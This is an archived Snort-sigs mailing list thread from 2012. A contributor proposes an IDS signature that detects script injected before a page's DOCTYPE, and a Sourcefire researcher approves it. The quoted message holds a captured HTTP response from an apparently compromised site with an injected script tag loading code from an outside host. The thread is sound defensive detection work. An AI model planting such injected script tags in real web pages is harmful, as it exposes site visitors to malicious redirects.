Snort mailing list archives
Re: SIG: Script before DOCTYPE
From: Alex Kirk <akirk () sourcefire com>
Date: Thu, 21 Jun 2012 15:37:26 -0400
That actually seems reasonable. You should only ever see <!DOCTYPE at the start of a page, so I'd be surprised if this generates false positives. Would you like this to be included in the VRT set? On Thu, Jun 21, 2012 at 3:27 PM, Lay, James <james.lay () wincofoods com>wrote:
All,**** ** ** Not sure if this is a good sig or not:**** ** ** alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALWARE script before DOCTYPE possible malicious redirect"; flow:to_client,established; file_data; content:"</script><!DOCTYPE"; distance:0; nocase; metadata:policy security-ips drop, service http; classtype:web-application-attack; sid:xxxxxxx; rev:1;)**** ** ** Many times that I’ve seen malicious JavaScript injected it’s usually right at the top:**** ** ** ** ** HTTP/1.1 200 OK**** Date: Mon, 18 Jun 2012 17:29:21 GMT**** Server: Apache**** X-Powered-By: PHP/5.2.17**** Set-Cookie: frontend=bleh; expires=Sun, 16-Sep-2012 17:29:21 GMT; path=/; domain=www.glasstilestore.com; HttpOnly**** Expires: Thu, 19 Nov 1981 08:52:00 GMT**** Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0**** Pragma: no-cache**** Set-Cookie: frontend=bleh; expires=Sun, 16-Sep-2012 17:29:21 GMT; path=/; domain=www.glasstilestore.com; httponly**** Vary: Accept-Encoding,User-Agent**** X-UA-Compatible: IE=8**** Keep-Alive: timeout=3, max=100**** Connection: Keep-Alive**** Transfer-Encoding: chunked**** Content-Type: text/html; charset=UTF-8**** **** **** dd13**** <script src='http://httpjs.com/api' type='text/javascript'></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">**** <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">**** <head>**** **** <!-- Google Website Optimizer Control Script -->**** <script>**** ** ** I welcome any pointers or reasons this sig stinks…danke J**** ** ** James **** ------------------------------------------------------------------------------ Live Security Virtual Conference Exclusive live event will cover all the ways today's security and threat landscape has changed and how IT managers can respond. Discussions will include endpoint security, mobile security and the latest in malware threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ _______________________________________________ Snort-sigs mailing list Snort-sigs () lists sourceforge net https://lists.sourceforge.net/lists/listinfo/snort-sigs http://www.snort.org Please visit http://blog.snort.org for the latest news about Snort!
-- Alex Kirk AEGIS Program Lead Sourcefire Vulnerability Research Team +1-410-423-1937 alex.kirk () sourcefire com
------------------------------------------------------------------------------ Live Security Virtual Conference Exclusive live event will cover all the ways today's security and threat landscape has changed and how IT managers can respond. Discussions will include endpoint security, mobile security and the latest in malware threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________ Snort-sigs mailing list Snort-sigs () lists sourceforge net https://lists.sourceforge.net/lists/listinfo/snort-sigs http://www.snort.org Please visit http://blog.snort.org for the latest news about Snort!
Current thread:
- SIG: Script before DOCTYPE Lay, James (Jun 21)
- Re: SIG: Script before DOCTYPE Alex Kirk (Jun 21)
- Re: SIG: Script before DOCTYPE Lay, James (Jun 21)
- Re: SIG: Script before DOCTYPE Alex Kirk (Jun 21)